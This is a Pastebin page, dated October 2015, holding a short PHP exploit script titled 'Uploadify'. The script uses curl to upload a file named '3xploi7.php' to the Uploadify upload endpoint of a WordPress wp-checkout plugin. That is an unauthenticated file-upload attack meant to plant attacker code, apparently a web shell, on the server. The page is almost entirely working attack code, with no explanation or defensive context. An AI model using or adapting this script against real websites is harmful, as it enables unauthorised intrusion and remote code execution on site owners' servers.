Advertisement
kmlhxr

Uploadify

Oct 31st, 2015
146
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.42 KB | None | 0 0
  1. <?php
  2.  
  3.  
  4. $uploadfile="3xploi7.php";
  5. $ch = curl_init("http://localhost/wp-content/uploads/wp-checkout/uploadify/upload.php");
  6. curl_setopt($ch, CURLOPT_POST, true);
  7. curl_setopt($ch, CURLOPT_POSTFIELDS,
  8.          array('Filedata'=>"@$uploadfile",
  9.           'folder'=>'/wp-content/uploads/wp-checkout/'));
  10. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  11. $postResult = curl_exec($ch);
  12. curl_close($ch);
  13. print "$postResult";
  14.  
  15. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement